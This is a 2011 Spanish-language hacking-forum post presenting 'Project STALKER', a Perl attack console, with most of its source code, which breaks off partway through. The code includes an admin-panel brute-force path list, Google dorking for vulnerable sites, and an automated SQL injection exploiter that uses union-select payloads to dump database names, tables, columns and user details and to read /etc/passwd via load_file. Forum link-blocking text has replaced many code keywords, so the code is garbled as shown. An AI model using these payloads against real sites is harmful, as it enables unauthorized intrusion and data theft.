send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl] Project STALKER

  • 0 Respuestas
  • 1105 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 544
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Agosto 19, 2011, 11:30:36 pm »
Bueno esta es la nueva version de la consola que eh estado haciendo en perl con las siguiente funciones

  • Mejoras
[++] Diseño
[++] Repare algunos bugs
[++] Mejor manejo con control+c
[++] Agregue un cliente mysql

  • Opciones
[++] Reconocer ip de un host
[++] Capturar todos los links de una pagina
[++] Tener una lista de todos los procesos de windows con posibilidad de cerrar el que queramos
[++] Cliente mediante sockets
[++] Reconocer los metodos HTTP en una web
[++] Captura links y busca posibles paths para listado de directorios
[++] Encode/decode para base64,hex,ascii
[++] Scanner Port
[++] Busca panel de admin
[++] k0bra incorporado (Scanner SQLI)
[++] Cliente FTP
[++] Navegador de archivos con posibilidad de borrar,renombrar archivos o directorios
[++] Scan Google para buscar paginas vulnerables a SQLI

El codigo es el siguiente

Código: Perl
  1. #!usr/bin/perl
  2. #Project STALKER (C) Doddy Hackman 2011
  3. #
  4. #ppm install http://www.bribes.org/perl/ppm/DBI.ppd
  5. #ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
  6. #
  7. #You need download this http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
  8. #
  9.  
  10. use IO::Socket;
  11. use HTML::LinkExtor;
  12. use LWP::UserAgent;
  13. use Win32::OLE You are not allowed to view links. Register or Login(in);
  14. use Win32::Process;
  15. use Net::FTP;
  16. use Cwd;
  17. use URI::Split You are not allowed to view links. Register or Login(uri_split);
  18. use MIME::Base64;
  19. use DBI;
  20. use Color::Output;
  21. Color::Output::Init
  22.  
  23. @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
  24. ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
  25. ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
  26. ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
  27. ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
  28. ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
  29. ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
  30. ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
  31. ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
  32. ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
  33. ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
  34. ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
  35. ,'administration/','administration/index.php','administration/login.php'
  36. ,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
  37. ,'system/login.php','admin.php','login.php','administrador.php','administration.php'
  38. ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
  39. ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
  40. ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
  41. ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
  42. ,'administrator/','administrator/index.html','administrator/login.html'
  43. ,'administrator/account.html','administrator/account.php','administrator.html','login.html'
  44. ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
  45. ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
  46. ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
  47. ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
  48. ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
  49. ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
  50. ,'administrator/login.asp','administrator/account.asp','administrator.asp'
  51. ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
  52. ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
  53. ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
  54. ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
  55. ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
  56. ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
  57. ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
  58. ,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
  59. ,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
  60. ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
  61. ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
  62. ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
  63. ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
  64. ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
  65. ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
  66. ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
  67. ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
  68. ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
  69. ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
  70. ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
  71. ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
  72. ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
  73. ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
  74. ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
  75. ,'server/','database_administration/','power_user/','system_administration/'
  76. ,'ss_vms_admin_sm/');
  77.  
  78.  
  79. unless (-d "/logs/webs") {
  80. You are not allowed to view links. Register or Login("logs/",777);
  81. You are not allowed to view links. Register or Login("logs/webs/",777);
  82. }
  83.  
  84. my $nave = LWP::UserAgent->new;
  85. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  86. $nave->timeout(5);
  87.  
  88. head();
  89.  
  90. getinfo();
  91.  
  92. $SIG{INT} = \&next;
  93.  
  94. while(1) {
  95. cprint "\x037"; #13
  96. menujo();
  97. cprint "\x030";
  98. }
  99.  
  100. sub getinfo {
  101. $so = $^O;
  102. $login = Win32::LoginName();
  103. $domain = Win32::DomainName();
  104. cprint "\x0313"; #13
  105. You are not allowed to view links. Register or Login "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n";
  106. cprint "\x030";
  107. }
  108.  
  109.  
  110. sub menujo {
  111. You are not allowed to view links. Register or Login "\n\n>";
  112. You are not allowed to view links. Register or Login (my $cmd = <stdin>);
  113. You are not allowed to view links. Register or Login "\n\n";
  114.  
  115. if ($cmd=~/getinfo/ig) {
  116. getinfo();
  117. }
  118. elsif ($cmd =~/getip (.*)/) {
  119. my $te = $1;
  120. if ($te eq "" or $te eq " ") {
  121. You are not allowed to view links. Register or Login "\n[+] sintax : getip <host>\n";
  122. }
  123. You are not allowed to view links. Register or Login "\n[IP] : ".getip($1)."\n";
  124. You are not allowed to view links. Register or Login "\n";
  125. }
  126.  
  127. elsif ($cmd =~/getlink (.*)/) {
  128. You are not allowed to view links. Register or Login "[+] Extracting links in the page\n\n\n";
  129. $code = toma($1);
  130. my @re = get_links($code);
  131. for my $url(@re) {
  132. You are not allowed to view links. Register or Login $url;
  133. You are not allowed to view links. Register or Login "[Link] : $url\n";
  134. }
  135. You are not allowed to view links. Register or Login "\n\n[+] Finish\n";
  136. }
  137.  
  138. elsif ($cmd=~/help/) {
  139. helpme();
  140. }
  141.  
  142. elsif ($cmd=~/getprocess/) {
  143. my %re = getprocess();
  144.  
  145.  
  146. for my $data(You are not allowed to view links. Register or Login %re) {
  147. ($proceso,$pid) = ($t=~/(.*):(.*)/ig);
  148. You are not allowed to view links. Register or Login "[+] Proceso : ".$data."\n";
  149. You are not allowed to view links. Register or Login "[+] PID : ".$re{$data}."\n\n";
  150. }
  151. }
  152. elsif ($cmd=~/killprocess (.*) (.*)/) {
  153. if (killprocess($1,$2)) {
  154. You are not allowed to view links. Register or Login "[+] Process $1 closed";
  155. }
  156. }
  157. elsif ($cmd=~/conec (.*) (.*) (.*)/) {
  158. You are not allowed to view links. Register or Login conectar($1,$2,$3);
  159. }
  160. elsif ($cmd=~/allow (.*)/) {
  161. $re = conectar($1,"80","GET / HTTP/1.0\r\n");
  162. if ($re=~/Allow:(.*)/ig) {
  163. You are not allowed to view links. Register or Login "[+] Metodos : ".$1."\n";
  164. }}
  165. elsif ($cmd=~/paths (.*)/) {
  166. scanpaths($1);
  167. }
  168. elsif ($cmd=~/encodehex (.*)/) {
  169. You are not allowed to view links. Register or Login "\n\n[+] ".hex_en($1)."\n\n";
  170. }
  171. elsif ($cmd=~/decodehex (.*)/) {
  172. You are not allowed to view links. Register or Login "\n\n[+] ".hex_de($1)."\n\n";
  173. }
  174. elsif ($cmd=~/download (.*) (.*)/) {
  175. my $file,$name = $1,$2;
  176. if (download($1,$2)) {
  177. You are not allowed to view links. Register or Login "[+] File downloaded\n";
  178. }
  179. }
  180. elsif ($cmd=~/encodeascii (.*)/) {
  181. You are not allowed to view links. Register or Login "\n\n[+] ".ascii($1)."\n\n";
  182. }
  183. elsif ($cmd=~/decodeascii (.*)/) {
  184. You are not allowed to view links. Register or Login "\n\n[+] ".ascii_de($1)."\n\n";
  185. }
  186. elsif ($cmd=~/encodebase (.*)/) {
  187. You are not allowed to view links. Register or Login "\n\n[+] ".base($1)."\n\n";
  188. }
  189. elsif ($cmd=~/decodebase (.*)/) {
  190. You are not allowed to view links. Register or Login "\n\n[+] ".base_de($1)."\n\n";
  191. }
  192. elsif ($cmd=~/aboutme/) {
  193. aboutme();
  194. }
  195. elsif ($cmd=~/scanport (.*)/) {
  196. scanport($1);
  197. }
  198. elsif ($cmd=~/panel (.*)/) {
  199. scanpanel($1);
  200. }
  201. elsif ($cmd=~/scangoogle/) {
  202. You are not allowed to view links. Register or Login "[Dork] : ";
  203. You are not allowed to view links. Register or Login(my $dork = <stdin>);
  204. You are not allowed to view links. Register or Login "\n\n[Pages] : ";
  205. You are not allowed to view links. Register or Login(my $pages = <stdin>);
  206. You are not allowed to view links. Register or Login "\n\n[Starting the search]\n\n";
  207. my @links = google($dork,$pages);
  208. You are not allowed to view links. Register or Login "\n[Links Found] : ".You are not allowed to view links. Register or Login(@links)."\n\n\n";
  209. You are not allowed to view links. Register or Login "[Starting the scan]\n\n\n";
  210. for my $link(@links) {
  211. if ($link=~/(.*)=/ig) {
  212. my $web = $1;
  213. sql($web."=");
  214. }}
  215. You are not allowed to view links. Register or Login "\n\n[+] Finish\n";
  216. }
  217. elsif ($cmd=~/getpass (.*)/) {
  218. crackit($1);
  219. }
  220. elsif ($cmd=~/ftp (.*) (.*) (.*)/) {
  221. ftp($1,$2,$3);
  222. }
  223. elsif ($cmd=~/navegator/) {
  224. nave:
  225. You are not allowed to view links. Register or Login getcwd().">";
  226. You are not allowed to view links. Register or Login(my $rta = <stdin>);
  227. You are not allowed to view links. Register or Login "\n\n";
  228. if ($rta=~/list/) {
  229. my @files = coleccionar(getcwd());
  230. for(@files) {
  231. if (-f $_) {
  232. You are not allowed to view links. Register or Login "[File] : ".$_."\n";
  233. } else {
  234. You are not allowed to view links. Register or Login "[Directory] : ".$_."\n";
  235. }}}
  236. if ($rta=~/cd (.*)/) {
  237. my $dir = $1;
  238. if (You are not allowed to view links. Register or Login($dir)) {
  239. You are not allowed to view links. Register or Login "\n[+] Directory changed\n";
  240. } else {
  241. You are not allowed to view links. Register or Login "\n[-] Error\n";
  242. }}
  243. if ($rta=~/del (.*)/) {
  244. my $file = getcwd()."/".$1;
  245. if (-f $file) {
  246. if (You are not allowed to view links. Register or Login($file)) {
  247. You are not allowed to view links. Register or Login "\n[+] File Deleted\n";
  248. } else {
  249. You are not allowed to view links. Register or Login "\n[-] Error\n";
  250. }
  251. } else {
  252. if (You are not allowed to view links. Register or Login($file)) {
  253. You are not allowed to view links. Register or Login "\n[+] Directory Deleted\n";
  254. } else {
  255. You are not allowed to view links. Register or Login "\n[-] Error\n";
  256. }}}
  257. if ($rta=~/You are not allowed to view links. Register or Login (.*) (.*)/) {
  258. if (You are not allowed to view links. Register or Login(getcwd()."/".$1,getcwd()."/".$2)) {
  259. You are not allowed to view links. Register or Login "\n[+] File Changed\n";
  260. } else {
  261. You are not allowed to view links. Register or Login "\n[-] Error\n";
  262. }}
  263. if ($rta=~/You are not allowed to view links. Register or Login (.*)/) {
  264. my $file = $1;
  265. You are not allowed to view links. Register or Login $file;
  266. You are not allowed to view links. Register or Login($file);
  267. #system(getcwd()."/".$file);
  268. }
  269. if ($rta=~/help/) {
  270. You are not allowed to view links. Register or Login "\nCommands : help cd list del rename open exit\n\n";
  271. }
  272. if ($rta=~/You are not allowed to view links. Register or Login/) {
  273. next;
  274. }
  275. You are not allowed to view links. Register or Login "\n\n";
  276. You are not allowed to view links. Register or Login nave;
  277. }
  278. elsif ($cmd=~/kobra (.*)/) {
  279. my $url = $1;
  280. You are not allowed to view links. Register or Login $url;
  281. scansqli($url,"--");
  282. }
  283. elsif ($cmd=~/mysql (.*) (.*) (.*)/) {
  284. enter($1,$2,$3);
  285. }
  286. elsif ($cmd=~/You are not allowed to view links. Register or Login/) {
  287. copyright();
  288. <stdin>;
  289. You are not allowed to view links. Register or Login(1);
  290. }
  291. else {
  292. You are not allowed to view links. Register or Login($cmd);
  293. }
  294. #print "\n\n";
  295. }
  296.  
  297.  
  298. sub scansqli {
  299. You are not allowed to view links. Register or Login "[Status] : Scanning.....\n";
  300. $pass = &bypass($_[1]);
  301. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  302. my $save = $auth;
  303. if ($_[0]=~/hackman/ig) {
  304. savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
  305. &menu_options($_[0],$pass,$save);
  306. }
  307. my ($gen,$save,$control) = &You are not allowed to view links. Register or Login($_[0],$_[1]);
  308. if ($control eq 1) {
  309. You are not allowed to view links. Register or Login "[Status] : Enjoy the menu\n\n";
  310. &menu_options($gen,$pass,$save);
  311. } else {
  312. You are not allowed to view links. Register or Login $control;
  313. You are not allowed to view links. Register or Login "[Status] : Length columns not found\n\n";
  314. menujo();
  315. }
  316. }
  317.  
  318. sub You are not allowed to view links. Register or Login {
  319. my $rows  = "0";
  320. my $asc;
  321. my $page = $_[0];
  322. ($pass1,$pass2) = &bypass($_[1]);
  323. $inyection = $page.$pass1."and".$pass1."1=0".$pass1."order".$pass1."by".$pass1."9999999999".$pass2;
  324. $code = toma($inyection);
  325. if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/unknown column/ig || $code=~/Call to undefined function/ig) {
  326. my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
  327. my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
  328. unless ($testar1 eq $testar2) {
  329. my $patha = $1;
  330. You are not allowed to view links. Register or Login $patha;
  331. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
  332. $total = "1";
  333. for my $rows(2..200) {
  334. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
  335. $total.= ",".$rows;
  336. $injection = $page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
  337. $test = toma($injection);
  338. if ($test=~/RATSXPDOWN/) {
  339. @number = $test =~You are not allowed to view links. Register or Login{RATSXPDOWN(\d+)RATSXPDOWN}g;
  340. $control = 1;
  341. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  342. my $save = $auth;
  343. savefile($save.".txt","\n[Target confirmed] : $page");
  344. savefile($save.".txt","[Bypass] : $_[1]\n");
  345. savefile($save.".txt","[Limit] : The site has $rows columns");
  346. savefile($save.".txt","[Data] : The number @number print data");
  347. if ($patha) {
  348. savefile($save.".txt","[Full Path Discloure] : $patha");
  349. }
  350. $total=~You are not allowed to view links. Register or Login/$number[0]/hackman/;
  351. savefile($save.".txt","[SQLI] : ".$page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
  352. You are not allowed to view links. Register or Login($page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
  353. }}}}}
  354.  
  355.  
  356. sub details {
  357. my ($page,$bypass,$save) = @_;
  358. ($pass1,$pass2) = &bypass($bypass);
  359. savefile($save.".txt","\n");
  360. if ($page=~/(.*)hackman(.*)/ig) {
  361. You are not allowed to view links. Register or Login "\n\n[+] Searching information..\n\n";
  362. my  ($start,$end) = ($1,$2);
  363. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
  364. $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
  365. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  366. $test1 = toma($inforschema);
  367. $test2 = toma($mysqluser);
  368. if ($test2=~/ERTOR854/ig) {
  369. savefile($save.".txt","[mysql.user] : ON");
  370. You are not allowed to view links. Register or Login "[mysql.user] : ON\n";
  371. } else {
  372. You are not allowed to view links. Register or Login "[mysql.user] : OFF\n";
  373. savefile($save.".txt","[mysql.user] : OFF");
  374. }
  375. if ($test1=~/ERTOR854/ig) {
  376. You are not allowed to view links. Register or Login "[information_schema.tables] : ON\n";
  377. savefile($save.".txt","[information_schema.tables] : ON");
  378. } else {
  379. You are not allowed to view links. Register or Login "[information_schema.tables] : OFF\n";
  380. savefile($save.".txt","[information_schema.tables] : OFF");
  381. }
  382. if ($test3=~/ERTOR854/ig) {
  383. You are not allowed to view links. Register or Login "[+] load_file permite ver los archivos\n";
  384. savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  385. }
  386. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
  387. $injection = $start.$concat.$end.$pass2;
  388. $code = toma($injection);
  389. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
  390. You are not allowed to view links. Register or Login "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
  391. savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
  392. } else {
  393. You are not allowed to view links. Register or Login "\n[-] Not found any data\n";
  394. }}}
  395.  
  396.  
  397. sub menu_options {
  398.  
  399. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  400. my $save = $auth;
  401. You are not allowed to view links. Register or Login "\n/logs/webs/$save>";
  402. You are not allowed to view links. Register or Login (my $rta = <stdin>);
  403.  
  404. if ($rta=~/help/) {
  405. You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login(
  406.  
  407. commands : details tables columns dbs othertable othercolumn
  408.            mysqluser dumper logs You are not allowed to view links. Register or Login
  409.  
  410. );
  411. }
  412.  
  413.  
  414. if ($rta =~/tables/) {
  415. schematables($_[0],$_[1],$save);
  416. &reload;       
  417. }
  418. elsif ($rta =~/columns (.*)/) {
  419. my $tabla = $1;
  420. schemacolumns($_[0],$_[1],$save,$tabla);
  421. &reload;
  422. }
  423. elsif ($rta =~/dbs/) {
  424. &schemadb($_[0],$_[1],$save);
  425. &reload;
  426. }
  427. elsif ($rta =~/othertable (.*)/) {
  428. my $data = $1;
  429. &schematablesdb($_[0],$_[1],$data,$save);
  430. &reload;
  431. }
  432. elsif ($rta =~/othercolumn (.*) (.*)/){
  433. my ($db,$table) = ($1,$2);
  434. &schemacolumnsdb($_[0],$_[1],$db,$table,$save);
  435. &reload;
  436. }
  437. elsif ($rta =~/mysqluser/) {
  438. &mysqluser($_[0],$_[1],$save);
  439. &reload;
  440. }
  441. elsif ($rta=~/logs/) {
  442. $t = "logs/webs/$save.txt";
  443. You are not allowed to view links. Register or Login("start $t");
  444. &reload;
  445. }
  446. elsif ($rta=~/You are not allowed to view links. Register or Login/) {
  447. next;
  448. }
  449.  
  450. elsif ($rta=~/dumper (.*) (.*) (.*)/) {
  451. my ($tabla,$col1,$col2) = ($1,$2,$3);
  452. &You are not allowed to view links. Register or Login($_[0],$col1,$col2,$tabla,$_[1],$save);
  453. &reload;
  454. }
  455. elsif ($rta =~/details/) {
  456. &details($_[0],$_[1],$save);
  457. &reload;
  458. }
  459. else {
  460. &reload;
  461. }
  462. }
  463.  
  464.  
  465.  
  466. sub schematables {
  467. $real = "1";
  468. my ($page,$bypass,$save) = @_;
  469. savefile($save.".txt","\n");
  470. You are not allowed to view links. Register or Login "\n";
  471. my $page1 = $page;
  472. ($pass1,$pass2) = &bypass($_[1]);
  473. savefile($save.".txt","[DB] : default");
  474. You are not allowed to view links. Register or Login "\n[+] Searching tables with schema\n\n";
  475. $page =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  476. $page1=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  477. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
  478. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  479. my $resto = $1;
  480. $total = $resto - 17;
  481. You are not allowed to view links. Register or Login "[+] Tables Length :  $total\n\n";
  482. savefile($save.".txt","[+] Searching tables with schema\n");
  483. savefile($save.".txt","[+] Tables Length :  $total\n");
  484. my $limit = $1;
  485. for my $limit(17..$limit) {
  486. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
  487. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  488. my $table = $1;
  489. You are not allowed to view links. Register or Login $table;
  490. You are not allowed to view links. Register or Login "[Table $real Found : $table ]\n";
  491. savefile($save.".txt","[Table $real Found : $table ]");
  492. $real++;
  493. }}
  494. You are not allowed to view links. Register or Login "\n";
  495. } else {
  496. You are not allowed to view links. Register or Login "\n[-] information_schema = ERROR\n";
  497. }        
  498. }
  499.  
  500. sub reload {
  501. &menu_options($_[0]);
  502. }
  503.  
  504.  
  505. sub schemacolumns {
  506. my ($page,$bypass,$save,$table) = @_;
  507. my $page3 = $page;
  508. my $page4 = $page;
  509. savefile($save.".txt","\n");
  510. You are not allowed to view links. Register or Login "\n";
  511. ($pass1,$pass2) = &bypass($bypass);
  512. You are not allowed to view links. Register or Login "\n[DB] : default\n";
  513. savefile($save.".txt","[DB] : default");
  514. savefile($save.".txt","[Table] : $table\n");
  515. $page3=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  516. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
  517. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  518. You are not allowed to view links. Register or Login "\n[Columns Length : $1 ]\n\n";
  519. savefile($save.".txt","[Columns Length : $1 ]\n");
  520. my $si = $1;
  521. You are not allowed to view links. Register or Login $si;
  522. $page4=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  523. $real = "1";
  524. for my $limit2(0..$si) {
  525. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  526. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  527. You are not allowed to view links. Register or Login "[Column $real] : $1\n";
  528. savefile($save.".txt","[Column $real] : $1");
  529. $real++;
  530. }}
  531. You are not allowed to view links. Register or Login "\n";
  532. } else {
  533. You are not allowed to view links. Register or Login "\n[-] information_schema = ERROR\n";
  534. }}
  535.  
  536. sub schemadb {
  537. my ($page,$bypass,$save) = @_;
  538. my $page1 = $page;
  539. savefile($save.".txt","\n");
  540. You are not allowed to view links. Register or Login "\n\n[+] Searching DBS\n\n";
  541. ($pass1,$pass2) = &bypass($bypass);
  542. $page=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  543. $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
  544. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  545. my $limita = $1;
  546. You are not allowed to view links. Register or Login "[+] Databases Length : $limita\n\n";
  547. savefile($save.".txt","[+] Databases Length : $limita\n");
  548. $page1=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  549. $real = "1";
  550. for my $limit(0..$limita) {
  551. $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
  552. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  553. my $control = $1;
  554. if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
  555. You are not allowed to view links. Register or Login "[Database $real Found] $control\n";
  556. savefile($save.".txt","[Database $real Found] : $control");
  557. $real++;
  558. }
  559. }
  560. }
  561. You are not allowed to view links. Register or Login "\n";
  562. } else {
  563. You are not allowed to view links. Register or Login "[-] information_schema = ERROR\n";
  564. }
  565. }
  566.  
  567. sub schematablesdb {
  568. my $page = $_[0];
  569. my $db = $_[2];
  570. my $page1 = $page;
  571. savefile($_[3].".txt","\n");
  572. You are not allowed to view links. Register or Login "\n\n[+] Searching tables with DB $db\n\n";
  573. ($pass1,$pass2) = &bypass($_[1]);
  574. savefile($_[3].".txt","[DB] : $db");
  575. $page =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  576. $page1=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  577. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
  578. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
  579. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
  580. You are not allowed to view links. Register or Login "[+] Tables Length :  $1\n\n";
  581. savefile($_[3].".txt","[+] Tables Length :  $1\n");
  582. my $limit = $1;
  583. $real = "1";
  584. for my $lim(0..$limit) {
  585. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
  586. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
  587. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  588. my $table = $1;
  589. You are not allowed to view links. Register or Login $table;
  590. savefile($_[3].".txt","[Table $real Found : $table ]");
  591. You are not allowed to view links. Register or Login "[Table $real Found : $table ]\n";
  592. $real++;
  593. }}
  594. You are not allowed to view links. Register or Login "\n";    
  595. } else {
  596. You are not allowed to view links. Register or Login "\n[-] information_schema = ERROR\n";
  597. }}
  598.  
  599. sub schemacolumnsdb {
  600. my ($page,$bypass,$db,$table,$save) = @_;
  601. my $page3 = $page;
  602. my $page4 = $page;
  603. You are not allowed to view links. Register or Login "\n\n[+] Searching columns in table $table with DB $db\n\n";
  604. savefile($save.".txt","\n");
  605. ($pass1,$pass2) = &bypass($_[1]);
  606. savefile($save.".txt","\n[DB] : $db");
  607. savefile($save.".txt","[Table] : $table");
